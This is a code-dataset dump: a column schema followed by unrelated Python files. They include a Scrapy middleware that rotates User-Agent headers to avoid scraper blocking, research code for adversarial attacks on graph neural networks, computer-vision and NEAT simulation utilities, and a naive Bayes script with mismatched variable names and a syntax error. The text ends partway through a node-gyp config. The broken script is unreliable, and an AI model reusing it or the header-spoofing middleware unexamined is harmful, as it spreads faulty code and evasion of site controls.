blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
14fe14d5b0927cec2aafdb55e5df8d1d80138460
|
3ee7db94e09183f9fa7cc854fdb03b661c1d0b8c
|
/landchina/middlewares/middleware.py
|
e601d02f4109a4399723d51ec5f5f3c4be5c18fb
|
[] |
no_license
|
Eddy-zdz/landchina
|
44425eac71cfad5d6d456d8a472117f086e5b30c
|
85f26b8f4d8610dcce93abf6f1fd0da326e1ff17
|
refs/heads/master
| 2023-03-16T18:38:01.897874
| 2017-05-27T07:26:07
| 2017-05-27T07:26:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
# encoding:utf-8ß
from random import *
from landchina.middlewares.user_agents import agents
class UserAgentMiddleware(object):
'''换user-agent'''
def process_request(self, request, spider):
agent = choice(agents)
request.headers["User-Agent"] = agent
|
[
"yuhangzhan@YuhangdeMacBook-Pro.local"
] |
yuhangzhan@YuhangdeMacBook-Pro.local
|
4123cc56630e37945d21654123abf8df84261538
|
bae78540696a58c5f43e3234b6dc16ccdb4adb03
|
/node_attack/attackSet.py
|
26c47fe2940a8621125bdec0c8d2649627f9e8e6
|
[] |
no_license
|
Gadishenhar/adversarial_gnn
|
8996c08f4432ee19f13d3e0f28706a32a13a43ad
|
79a0ef983028fa1007ecf8c1c009aa7e43cab83b
|
refs/heads/master
| 2023-07-18T04:18:25.019267
| 2021-09-07T17:20:15
| 2021-09-07T17:20:15
| 357,277,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,654
|
py
|
from node_attack.attackVictim import attackVictim
from node_attack.attackTrainer import test
from classes.basic_classes import Print
import copy
import numpy as np
import torch
# a wrapper that chooses a victim node and attacks it using attackVictim
# an attack can have 3 modes described in parameter attack_params
# regular - for regular attacks
# adversarial - for adversarial training
# distance - for attack as a function of distance from the victim node
# important note: these modes only matter for the print output of the functions not for its functionality
def attackSet(attack, approach, print_answer, trainset):
device = attack.device
dataset = attack.dataset
data = dataset.data
if print_answer is not Print.NO:
printAttackHeader(attack=attack, approach=approach)
num_attacks, nodes_to_attack = getNodesToAttack(data=data, trainset=trainset)
attacked_nodes = np.random.choice(nodes_to_attack, num_attacks, replace=False)
attacked_nodes = torch.from_numpy(attacked_nodes).to(device)
y_targets = getClassificationTargets(attack=attack, num_attacks=num_attacks, attacked_nodes=attacked_nodes)
# chooses a victim node and attacks it using oneNodeAttack
attack_results_for_all_attacked_nodes = []
attack.model_wrapper.model.attack = True
model0 = copy.deepcopy(attack.model_wrapper.model)
for node_num in range(num_attacks):
attacked_node = torch.tensor([attacked_nodes[node_num]], dtype=torch.long).to(device)
y_target = torch.tensor([y_targets[node_num]], dtype=torch.long).to(device)
# check if the model is changed in between one node attacks
if not attack.mode.isAdversarial():
attack.setModel(model0)
classified_to_target = checkNodeClassification(attack=attack, attacked_node=attacked_node, y_target=y_target,
print_answer=print_answer, attack_num=node_num + 1)
# important note: the victim is attacked only if it is classified to y_target!
if classified_to_target:
attack_results = attackVictim(attack=attack, approach=approach, print_answer=print_answer,
attacked_node=attacked_node, y_target=y_target, node_num=node_num + 1)
# in case of an impossible attack (i.e. double attack with bfs of 1)
if attack_results is None:
attack_results = torch.tensor([[0, 0]])
# in case of a miss-classification
else:
attack_results = torch.tensor([[1, 0]])
attack_results_for_all_attacked_nodes.append(attack_results)
# print results and save accuracies
attack_results_for_all_attacked_nodes = torch.cat(attack_results_for_all_attacked_nodes)
mean_defence_results = getDefenceResultsMean(attack_results=attack_results_for_all_attacked_nodes,
num_attributes=data.x.shape[1])
attack.model_wrapper.model.attack = False
if print_answer is Print.YES:
print("######################## Attack Results ######################## ", flush=True)
printAttackHeader(attack=attack, approach=approach)
if not trainset:
printAttack(dataset=dataset, basic_log=attack.model_wrapper.basic_log,
mean_defence_results=mean_defence_results, num_attributes=data.x.shape[1])
return mean_defence_results, attacked_nodes, y_targets
# a function which prints the header for the final results
def printAttackHeader(attack, approach):
distance_log = ''
if attack.mode.isDistance():
distance_log += 'Distance: {:02d} '.format(attack.current_distance)
# the general print header
targeted_attack_str = 'Targeted' if attack.targeted else 'Untargeted'
if attack.mode.isDistance():
print("######################## " + distance_log + targeted_attack_str + " " + approach.string() + " " +
attack.model_wrapper.model.name + " Attack ########################", flush=True)
info = "######################## Max Attack Epochs:" + str(attack.attack_epochs)
if attack.l_inf is not None:
info += " Linf:{:.2f}".format(attack.l_inf)
print(info + " lr:" + str(attack.lr) + " ########################", flush=True)
# a helper that checks that we do not exceed the num of nodes available in our train/test sets
def getNodesToAttack(data, trainset):
if trainset:
num_attacks = torch.sum(data.train_mask).item()
nodes_to_attack = np.where(np.array(data.train_mask.tolist()))[0]
else:
num_attacks = torch.sum(data.test_mask).item()
nodes_to_attack = np.where(np.array(data.test_mask.tolist()))[0]
return num_attacks, nodes_to_attack
# a helper that returns the target of the attack task
# if the attack is targeted it will return the target classification
# if the attack is untargeted it will return the correct classification of the node
def getClassificationTargets(attack, num_attacks, attacked_nodes):
dataset = attack.dataset
data = dataset.data
device = attack.device
if attack.targeted:
y_targets = np.random.random_integers(0, dataset.num_classes - 2, size=num_attacks)
y_targets = torch.from_numpy(y_targets).to(device)
for idx, _ in enumerate(y_targets):
if y_targets[idx] == data.y[attacked_nodes[idx]]:
y_targets[idx] = dataset.num_classes - 1
else:
y_targets = data.y[attacked_nodes].to(device)
return y_targets.type(torch.LongTensor).to(device)
# a helper function that checks if the node is currecly classified to y_target
@torch.no_grad()
def checkNodeClassification(attack, attacked_node, y_target, print_answer, attack_num):
results = test(attack.dataset.data, attack.model_wrapper.model, attack.targeted, attacked_node, y_target)
classified_to_target = not results[3]
if not classified_to_target and print_answer is Print.YES:
attack_log = 'Attack: {:03d}, Node: {}, Misclassified already!\n' \
.format(attack_num, attacked_node.item())
if attack.mode.isAdversarial():
attack_log = 'Adv Epoch: {:03d}, '.format(attack.idx) + attack_log
print(attack_log, flush=True)
return classified_to_target
def getDefenceResultsMean(attack_results, num_attributes):
attack_results = attack_results.type(torch.FloatTensor)
mean_defence_results = attack_results.mean(dim=0)
mask1 = (attack_results[:, 1] != 0)
mask2 = (attack_results[:, 1] != num_attributes)
mask = torch.logical_and(mask1, mask2)
if torch.sum(mask) > 0:
mean_defence_results[1] = torch.mean(attack_results[mask, 1], dim=0)
else:
mean_defence_results[1] = num_attributes
mean_defence_results[0] = 1 - mean_defence_results[0]
return mean_defence_results
# a function which prints final results
def printAttack(dataset, basic_log, mean_defence_results, num_attributes):
attack_log = ''
if basic_log is not None:
attack_log += basic_log + ', '
attack_log += 'Test Defence Success: {:.4f}\n'
attack_log = attack_log.format(mean_defence_results[0].item())
if not dataset.skip_attributes:
if mean_defence_results[1] != num_attributes:
num_of_attack_attributes = mean_defence_results[1].item()
mus = tuple([num_of_attack_attributes] + [num_of_attack_attributes / num_attributes])
attack_log += '#Success attack attributes: {:.1f}, #Success attack attributes%: {:.3f}\n'.format(*mus)
else:
attack_log += 'All attacks fail, no #attributes'
print(attack_log, flush=True)
|
[
"gadi.shenhar@gmail.com"
] |
gadi.shenhar@gmail.com
|
cfbbe9fd87346ac41ce6d9352492c08480e4ec86
|
3cdbe5f5810a035ae168f8ff01c39f58c571e428
|
/golf/migrations/0047_auto_20171013_0759.py
|
3a2a55b2b3c56503895e31b0b55d1c431628e5d5
|
[
"MIT"
] |
permissive
|
kenrumer/scorekeeper
|
ebd6467e2ecde3da96bb08ef77a56f967cbde00e
|
c7f22676e84dfdf6ca3361c6ff56719f68fce31f
|
refs/heads/master
| 2021-01-22T05:01:11.370869
| 2018-01-12T07:13:20
| 2018-01-12T07:13:20
| 102,276,714
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-13 07:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('golf', '0046_auto_20171013_0021'),
]
operations = [
migrations.RemoveField(
model_name='round',
name='tournament',
),
migrations.AddField(
model_name='round',
name='tournament_date',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='golf.TournamentDate', verbose_name='Tournament and Date'),
),
]
|
[
"kenrumer@gmail.com"
] |
kenrumer@gmail.com
|
98baca09d978b22e4aafe983659206cae94d96c0
|
5c790dc4cde3914edb7af4ac67030b0e85f4a8a2
|
/utils/evaluation_utils.py
|
82c4715a192d3c361c849896b035cd91ee56dc42
|
[
"MIT"
] |
permissive
|
wx-b/SGMNet
|
49e39907793a48ff0a3cc512aba70fa743a8ebb2
|
52a1ebebb33b4ba952f95d239d25e600b5b8d989
|
refs/heads/main
| 2023-09-04T06:41:52.603991
| 2021-10-30T04:54:18
| 2021-10-30T04:54:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,484
|
py
|
import numpy as np
import h5py
import cv2
def normalize_intrinsic(x,K):
#print(x,K)
return (x-K[:2,2])/np.diag(K)[:2]
def normalize_size(x,size,scale=1):
size=size.reshape([1,2])
norm_fac=size.max()
return (x-size/2+0.5)/(norm_fac*scale)
def np_skew_symmetric(v):
zero = np.zeros_like(v[:, 0])
M = np.stack([
zero, -v[:, 2], v[:, 1],
v[:, 2], zero, -v[:, 0],
-v[:, 1], v[:, 0], zero,
], axis=1)
return M
def draw_points(img,points,color=(0,255,0),radius=3):
dp = [(int(points[i, 0]), int(points[i, 1])) for i in range(points.shape[0])]
for i in range(points.shape[0]):
cv2.circle(img, dp[i],radius=radius,color=color)
return img
def draw_match(img1, img2, corr1, corr2,inlier=[True],color=None,radius1=1,radius2=1,resize=None):
if resize is not None:
scale1,scale2=[img1.shape[1]/resize[0],img1.shape[0]/resize[1]],[img2.shape[1]/resize[0],img2.shape[0]/resize[1]]
img1,img2=cv2.resize(img1, resize, interpolation=cv2.INTER_AREA),cv2.resize(img2, resize, interpolation=cv2.INTER_AREA)
corr1,corr2=corr1/np.asarray(scale1)[np.newaxis],corr2/np.asarray(scale2)[np.newaxis]
corr1_key = [cv2.KeyPoint(corr1[i, 0], corr1[i, 1], radius1) for i in range(corr1.shape[0])]
corr2_key = [cv2.KeyPoint(corr2[i, 0], corr2[i, 1], radius2) for i in range(corr2.shape[0])]
assert len(corr1) == len(corr2)
draw_matches = [cv2.DMatch(i, i, 0) for i in range(len(corr1))]
if color is None:
color = [(0, 255, 0) if cur_inlier else (0,0,255) for cur_inlier in inlier]
if len(color)==1:
display = cv2.drawMatches(img1, corr1_key, img2, corr2_key, draw_matches, None,
matchColor=color[0],
singlePointColor=color[0],
flags=4
)
else:
height,width=max(img1.shape[0],img2.shape[0]),img1.shape[1]+img2.shape[1]
display=np.zeros([height,width,3],np.uint8)
display[:img1.shape[0],:img1.shape[1]]=img1
display[:img2.shape[0],img1.shape[1]:]=img2
for i in range(len(corr1)):
left_x,left_y,right_x,right_y=int(corr1[i][0]),int(corr1[i][1]),int(corr2[i][0]+img1.shape[1]),int(corr2[i][1])
cur_color=(int(color[i][0]),int(color[i][1]),int(color[i][2]))
cv2.line(display, (left_x,left_y), (right_x,right_y),cur_color,1,lineType=cv2.LINE_AA)
return display
|
[
"hchencf@connect.ust.hk"
] |
hchencf@connect.ust.hk
|
99a372505fbc2ad18b5b12d2199ed516c7e5cfe5
|
a43f26f346c4baa3483ecc6e7b28275c0ee2f0c4
|
/mlshizhan_pdf/naive_bayes/bayes.py
|
acdc4f3fb4321bbd3ca988b5c7a4782578083e29
|
[] |
no_license
|
Tguoliang/machine_learning
|
25223c7d4327a6a0e6f1c645c6fad63563b665e5
|
467b9140c0e5561824ae6b94fc43d47c43f421dd
|
refs/heads/master
| 2020-03-23T06:36:02.279056
| 2017-09-27T03:36:31
| 2017-09-27T03:36:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,046
|
py
|
from numpy import *
def loadDataSet():
postingList = [['my', 'dog', 'has', 'flea', \
'problems', 'help', 'please'],
['maybe', 'not', 'take', 'him', \
'to', 'dog', 'park', 'stupid'],
['my', 'dalmation', 'is', 'so', 'cute', \
'I', 'love', 'him'],
['stop', 'posting', 'stupid', 'worthless', 'garbage'],
['mr', 'licks', 'ate', 'my', 'steak', 'how',\
'to', 'stop', 'him'],
['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]
classVec = [0,1,0,1,0,1]
return postingList,classVec
def createVocabList(dataSet):
vocabSet = set([])
for document in dataSet:
vocabSet = vocabSet | set(document)
return list(vocabSet)
def setOfWords2Vec(vocabList, inputSet):
returnVec = [0]*len(vocabList)
for word in inputSet:
if word in vocabList:
returnVec[vocabList.index(word)] = 1
else:print("the word: %s is not in my Vocabulary! " % word)
return returnVec
def trainNB0(trainMatrix, trainCategory):
numTrainDocs = len(trainMatrix)
numWords = len(trainMatrix[0])
pAbusive = sum(trainCategory)/float(numTrainDocs)
p0Num = zeros(numWords); p1Num = zeros(numWords)
p0Denom = 0.0; plDenom = 0.0
for i in range(numTrainDocs):
if trainCategory[i] == 1:
plNum += trainMatrix[i]
plDenom += sum(trainMatrix[i])
else:
p0Num += trainMatrix[i]
p0Denom += sum(trainMatrix[i])
p1Vect = plNum/p1Denom
p0Vect = p0Num/p0Denom
return p0Vect,p1Vect,pAbusive
#计算出现频率
def calcMostFreq(vocabList,fullText):
import operator
freqDict = {}
for token in vocabList:
freqDict[token] = fullText.count(token)
sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1),\
reverse=True)
return sortedFreq[:30]
#计算出现频率
#
def localWords(feed1,feed0):
import feedparser
docList = []; classList = []; fullText = []
minLen = min(len(feed1['entries']),len(feed0['entries']))
for i in range(minLen):
wordList = textParse(feed1['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(1)
wordList = textParse(feed0['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(0)
vocabList = createVocabList(docList)
top30Words = calcMostFreq(vocabList, fullText)
for pairW in top30Words:
if pairW[0] in vocabList: vocabList|remove(pairW[0])
trainingSet = range(2*minLen); testSet = []
for i in range(20):
randIndex = int(random.uniform(0,len(trainingSet)))
testSet.append(trainingSet[randIndex])
del(trainingSet[randIndex])
trainMat = []; trainClasses = []
for docIndex in trainingSet:
trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
trainClasses.append(classList[docIndex])
p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))
errorCount = 0
for docIndex in testSet:
wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
if classifyNB(array(wordVector),p0V,p1V,pSpam) != \
classList[docIndex]:
errorCount += 1
print('the error rate is: ',float(errorCount)/len(testSet)
return vocabList,p0V,p1V
#
|
[
"1178599427@qq.com"
] |
1178599427@qq.com
|
4f75d73abfee6f0661d8d553c4fe61c2e504d5fc
|
04b41d0703bdc690331583c24a44940bf393d3a1
|
/dinoGameWBlinkDetector.py
|
ea23ebf31aa3cc7dc9cf6e569c45f17f42f0487d
|
[] |
no_license
|
create-bug/dinoGame_blinkDetection
|
6f17a2eda51cf99b80e2cf851a1a13a53648b54c
|
5a1d7c2dbf5b632e8590120592e6ff040008b391
|
refs/heads/master
| 2022-10-26T05:59:12.191488
| 2020-06-15T11:11:53
| 2020-06-15T11:11:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,033
|
py
|
import cv2
import dlib
from scipy.spatial import distance
import pyautogui
import time
def calculate_EAR(eye):
A = distance.euclidean(eye[1], eye[5])
B = distance.euclidean(eye[2], eye[4])
C = distance.euclidean(eye[0], eye[3])
ear_aspect_ratio = (A+B)/(2.0*C)
return ear_aspect_ratio
def jump():
pyautogui.keyDown('space')
time.sleep(0.01)
print("jump")
pyautogui.keyUp('space')
cap = cv2.VideoCapture(0)
hog_face_detector = dlib.get_frontal_face_detector()
dlib_facelandmark = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = hog_face_detector(gray)
for face in faces:
face_landmarks = dlib_facelandmark(gray, face)
leftEye = []
rightEye = []
for n in range(36,42):
x = face_landmarks.part(n).x
y = face_landmarks.part(n).y
leftEye.append((x,y))
next_point = n+1
if n == 41:
next_point = 36
x2 = face_landmarks.part(next_point).x
y2 = face_landmarks.part(next_point).y
cv2.line(frame,(x,y),(x2,y2),(0,255,0),1)
for n in range(42,48):
x = face_landmarks.part(n).x
y = face_landmarks.part(n).y
rightEye.append((x,y))
next_point = n+1
if n == 47:
next_point = 42
x2 = face_landmarks.part(next_point).x
y2 = face_landmarks.part(next_point).y
cv2.line(frame,(x,y),(x2,y2),(0,255,0),1)
left_ear = calculate_EAR(leftEye)
right_ear = calculate_EAR(rightEye)
EAR = (left_ear+right_ear)/2
EAR = round(EAR,2)
# print(EAR)
if EAR<0.26:
jump()
# cv2.putText(frame,"JUMP",(20,100), cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255),4)
# cv2.imwrite("image.jpg",frame)
cv2.imshow("Dino Game with Blink Detection", frame)
key = cv2.waitKey(1)
if key == 27:
break
cap.release()
cv2.destroyAllWindows()
|
[
"misbah4064@gmail.com"
] |
misbah4064@gmail.com
|
d0a080cd1772868b8f31fb2b141db45964827968
|
ada1320d2bace0f82e12249358861f893c788ae1
|
/RobotMaze.py
|
866c6edc960f6f1ebdbfb6fa11592e7c4976f268
|
[] |
no_license
|
fiberpaper/NEAT-world
|
9d5ef11c73a3f88e01747e92be239d98935f66a6
|
2821b6ce2564f78d93eb93f371b5d72692afb3e5
|
refs/heads/master
| 2020-03-14T02:30:23.854621
| 2018-04-28T11:03:18
| 2018-04-28T11:03:18
| 131,400,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,622
|
py
|
## v0 - 11/06/2017
## RobotMaze world
from Maze import maze
from Robot import robot
from RobotPhenotype import robot_phenotype
from Innovation import innovation
from Activations import activations
from Specie import specie
import Reproduction
import matplotlib.pyplot as plt
import numpy as np
import time
import pickle
import sys
## Define RobotMaze class
class robot_maze:
# Create world
def __init__(self,param):
# Global parameters
self.population_size=param['population_size']
self.maze_count=param['world_count']
self.max_species=param['max_species']
self.wall_nb=param['world_wall_nb']
self.pos_type=param['world_pos_type']
self.maze_type=param['world_type']
self.maze_size=param['world_size']
self.viability=param['viability']
self.activation_name=param['activation_func']
self.verbose=param['verbose']
self.debug=param['debug']
self.work_dir=param['work_dir']
self.debug=param['debug']
# Reproduction probabilities parameters
self.reproduction_dic={'keep_prct':param['keep_prct'],
'disable_gene_prob':param['disable_gene_prob'],
'crossover_prob':param['crossover_prob'],
'different_specie_crossover_prob':param['different_specie_crossover_prob'],
'weight_mut_prob':param['weight_mut_prob'],
'weight_mut_is_uniform_prob':param['weight_mut_is_uniform_prob'],
'add_node_prob':param['add_node_prob'],
'add_connection_prob':param['add_connection_prob'],
'change_activation_prob':param['change_activation_prob'],
'max_weight_perturb':param['max_weight_perturb']
}
# Activation functions
self.activation_func=self.activation_name
# Activation list
self.activation_list=activations(self.activation_func)
# Maze
self.mazes=list()
# Robots
self.R_parents=list()
self.R_children=list()
# Robot phenotype
self.Rphenotype_parents=robot_phenotype()
self.Rphenotype_children=robot_phenotype()
# Gene and innovation trackers (as list to be able to update them in sub routines)
self.cur_innovation=[-1]
self.cur_node=[-1]
# Innovation list to avoid duplicated mutations in a generation
self.innovation_list=innovation()
# Species
self.specie=specie(param['specie_delta'],param['c1_excess'],param['c2_disjoint'],param['c3_weight'])
# Populate world
def populate(self,load_maze=False,dir=-1):
print('# Populate world')
# Load Mazes if load_maze==True
if (load_maze) :
for i_maze in range(self.maze_count):
file = open(dir+'maze_'+str(i_maze)+'.p', "rb")
self.mazes.append(pickle.load(file))
file.close()
# Otherwise create mazes
else :
for i_maze in range(self.maze_count):
print('### Maze {}'.format(i_maze))
# Append new maze
if (self.wall_nb==-1):
self.mazes.append(maze(self.maze_size,self.maze_type,i_maze,position=self.pos_type))
else :
self.mazes.append(maze(self.maze_size,self.maze_type,self.wall_nb,position=self.pos_type))
# Save maze
if (dir == -1):
file = open('./maze_'+str(i_maze)+'.p', "wb")
else:
file = open(dir+'maze_'+str(i_maze)+'.p', "wb")
pickle.dump(self.mazes[-1],file)
file.close()
# Robots
for i_robot in range(self.population_size):
self.R_parents.append(robot(self.maze_count,self.mazes,self.cur_node,self.activation_func))
# Robots phenotypes
for i_robot in range(self.population_size):
self.Rphenotype_parents.add_robot(self.R_parents,i_robot,self.maze_count)
# Robots species
for i_robot in range(self.population_size):
self.specie.compatibility(self.R_parents[i_robot].genome)
# Species count
self.specie.count(self.R_parents)
# Reproduce population
def reproduce_pop(self):
# Reproduce parents
self.R_children=Reproduction.reproduce(self.R_parents,self.Rphenotype_parents,self.specie,self.max_species,self.population_size,self.maze_count,self.mazes,self.cur_node,self.cur_innovation,self.innovation_list,self.activation_func,self.reproduction_dic,self.debug)
# Children phenotypes
self.Rphenotype_children=robot_phenotype()
for i_robot in range(self.population_size):
self.Rphenotype_children.add_robot(self.R_children,i_robot,self.maze_count)
# Replace parents
del self.R_parents
del self.Rphenotype_parents
self.R_parents=self.R_children
self.Rphenotype_parents=self.Rphenotype_children
# Reset innovation
def reset_innovation(self):
self.innovation_list=innovation()
# Evaluate population
def eval_pop(self,max_step):
# Evaluate population
for i_robot in range(self.population_size):
# Compute time
t0=time.time()
# Variables initialization
t_move=0.0
t_fit=0.0
step=0
IsMoving=True
ReachedGoal=False
# Run only if not evaluated already
if (not self.R_parents[i_robot].IsEvaluated):
# Time
t0b=time.time()
# while robot moving, not reached goals on all mazes and not reached max step
while ( (step<max_step) and (not ReachedGoal) and (IsMoving)):
# Move robot
IsMoving=self.Rphenotype_parents.move_robot(self.R_parents,self.mazes,i_robot,self.maze_count,self.activation_list,time_step=1.0)
t0a=time.time()
t_move+=t0a-t0b
# Compute fitness every 50 steps
if (np.mod(step,50)==0):
ReachedGoal=self.Rphenotype_parents.compute_fitness(self.R_parents,self.mazes,i_robot,self.maze_count,max_dist=10)
t0b=time.time()
t_fit+=t0b-t0a
# Increment step
step+=1
#print(step,ReachedGoal,IsMoving)
# Compute adjusted fitness
self.Rphenotype_parents.adjust_fitness(self.R_parents,i_robot,self.specie)
# Switch flag for evaulation to True
self.R_parents[i_robot].IsEvaluated=True
# If goal reached stop and return
if (ReachedGoal):
print('Robot {} reached Goal !!!'.format(i_robot))
return True
# Time
t1=time.time()
# Print timing
sys.stdout.write('Robot {0:6d} took {1:4.2f} s to evaluate, move: {2:4.4f}, fit: {3:4.4f}, avg fitness: {4:4.4f} \r'.format(i_robot,t1-t0,t_move,t_fit,self.R_parents[i_robot].fitness_avg) )
sys.stdout.flush()
#print('Robot {0:6d} took {1:4.2f} s to evaluate, move: {2:4.4f}, fit: {3:4.4f}, avg fitness: {4:4.4f}'.format(i_robot,t1-t0,t_move,t_fit,self.R_parents[i_robot].fitness_avg))
return False
# Visualize world
def visualize(self,igen):
print('Visuliase world')
# Get 2 mazes max
n_maze = min(self.maze_count,4)
# Get 4 robots
n_robot = 4
# number column display
n_col = n_maze
# number rows display
n_row = n_robot
# Find the best 4
fitness_robot=np.zeros(len(self.R_parents))
for i_robot in range(len(self.R_parents)):
fitness_robot[i_robot]=self.R_parents[i_robot].fitness_avg
i_sorted_robot=sorted(range(len(fitness_robot)), key=lambda k: fitness_robot[k])
i_best_robot=i_sorted_robot[-4:]
print(i_best_robot)
print('# Best robot genome')
self.R_parents[i_best_robot[3]].genome.print_genome()
print('# Fitness best robot: {}'.format(self.R_parents[i_best_robot[3]].fitness_avg))
i_subplot=1
# For each robot
for i_robot in i_best_robot:
# For each maze
for i_maze in range(n_maze):
#Compute vizualisation
viz=self.R_parents[i_robot].visualize_path(i_maze,self.mazes)
plt.subplot(n_row,n_col,i_subplot)
plt.imshow(viz,cmap='gray')
i_subplot+=1
# Save plot with generation number
plt.savefig(self.work_dir+'images\\'+str(igen)+'.png', dpi=400, bbox_inches='tight')
# Number of species
print('Species count: {}',format(self.specie.specie_count))
print('Species delta: {}',format(self.specie.delta))
print('Number of species : {}'.format(len(self.specie.specie_count)))
# Evolve maze (TODO)
#def evolve(self):
# Evolve maze
#self.mazes.evolve_maze()
# Update robots accordingly
#for irobot in range(len(self.R_parents)):
# robot.update_maze(self.maze)
|
[
"noreply@github.com"
] |
fiberpaper.noreply@github.com
|
8a2b59abaae0e0a34340223ccf9dc23804f60308
|
578ff5c105747dc7520b11cd73893b32e458d9e5
|
/utils_ref/word_embed.py
|
530a3e254b12603370a7ec3861df2021bb382ba5
|
[] |
no_license
|
dulangaweerakoon/PhraseCutDataset
|
8cad581c8a059a0f2256ed580f5c1c71601ea875
|
86401015bf5c372a103d8459ad46a59455d6492b
|
refs/heads/master
| 2022-11-27T01:47:33.173591
| 2020-07-19T08:49:29
| 2020-07-19T08:49:29
| 277,823,431
| 0
| 0
| null | 2020-07-07T13:25:25
| 2020-07-07T13:25:25
| null |
UTF-8
|
Python
| false
| false
| 3,386
|
py
|
import numpy as np
class WordEmbed:
def __init__(self, lookup_path='data/fast_text/lookup_refvg_all.npy', vocab_size=-1, word_freq_thresh=0,
init_embed='fast_text'):
lookup = np.load(lookup_path, allow_pickle=True).item()
end_ix = len(lookup['ix_to_word']) # word[end_ix] is excluded from vocab
if vocab_size > 0:
end_ix = min(vocab_size, end_ix)
if word_freq_thresh > 0:
new_end_ix = end_ix
for i, f in enumerate(lookup['freq'][:end_ix]):
if f < word_freq_thresh:
new_end_ix = i
break
end_ix = new_end_ix
self.ix_to_word = lookup['ix_to_word'][:end_ix]
self.word_to_ix = {word: ix for ix, word in enumerate(self.ix_to_word)}
self.vocab_size = end_ix
print('vocabulary size: %d; minimum word frequency: %d' % (end_ix, lookup['freq'][end_ix - 1]))
if init_embed == 'fast_text':
self.embeddings = lookup['embeddings'][:end_ix]
elif init_embed == 'random':
self.embeddings = np.random.randn(end_ix, 300)
else:
self.embeddings = None
def encode_sentences_to_labels(self, sentences, label_length):
"""
Sentences are encoded with <BOS> at the beginning, <EOS> at the end, <PAD> if less than label_length,
<UNK> if there are unknown words. label_length includes <BOS> and <EOS>.
<PAD> --> 0; <UNK> --> 1; <BOS> --> 2; <EOS> --> 3
input sentences: list of n sentences in string format
return: int32 (n, label_length) zeros padded in end
"""
assert self.word_to_ix['<PAD>'] == 0
num_sents = len(sentences)
if num_sents == 0:
return None
labels = np.zeros((num_sents, label_length), dtype=np.int32)
for i, sentence in enumerate(sentences):
words = self.sentence_to_words(sentence)
for j, w in enumerate(words):
if j == label_length:
break
labels[i, j] = self.word_to_ix.get(w, self.word_to_ix['<UNK>'])
return labels
@staticmethod
def sentence_to_words(sentence):
def replace_special(string):
special = ['-', "'", ',', ':', '<', '.', '/', '?', '*', '"', '\\', '&', '\x00', '`', '!', ']', '[', '+',
'@', '(', ')']
string = string.lower()
i = 0
while i < len(string):
c = string[i]
if c in special:
string = string[:i] + ' ' + c + ' ' + string[i + 1:]
i += 2
i += 1
return string
sentence = replace_special(sentence)
words = sentence.split()
words = ['<BOS>'] + words + ['<EOS>']
return words
def decode_labels_to_sentences(self, labels):
"""
labels: int32 (n, label_length) zeros padded in end
return: list of sents in string format
"""
# print(labels)
decoded_sent_strs = []
num_sents = labels.shape[0]
for i in range(num_sents):
label = labels[i].tolist()
sent_str = ' '.join([self.ix_to_word[int(i)] for i in label if i != 0 and i != 2 and i != 3])
decoded_sent_strs.append(sent_str)
return decoded_sent_strs
|
[
"dulanga.weerakoon.lk@gmail.com"
] |
dulanga.weerakoon.lk@gmail.com
|
5fcf59afbbbc3f3e3cf18d7345abfcc604f5a5eb
|
2f2bd2556353bfdd8fb32f2fd996101a51c72a5c
|
/node_modules/peer/node_modules/restify/node_modules/dtrace-provider/build/config.gypi
|
2f096b356c4ca1e0356de426b48ce11ba5a6341e
|
[
"MIT",
"BSD-2-Clause"
] |
permissive
|
kenchangh/liveline
|
01602776febbcef6357390188c5915e35bd8244a
|
555cc291dd689aaf61cc0383b7b0260602281fd0
|
refs/heads/master
| 2021-05-27T13:58:10.947645
| 2014-08-01T06:25:46
| 2014-08-01T06:25:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,166
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
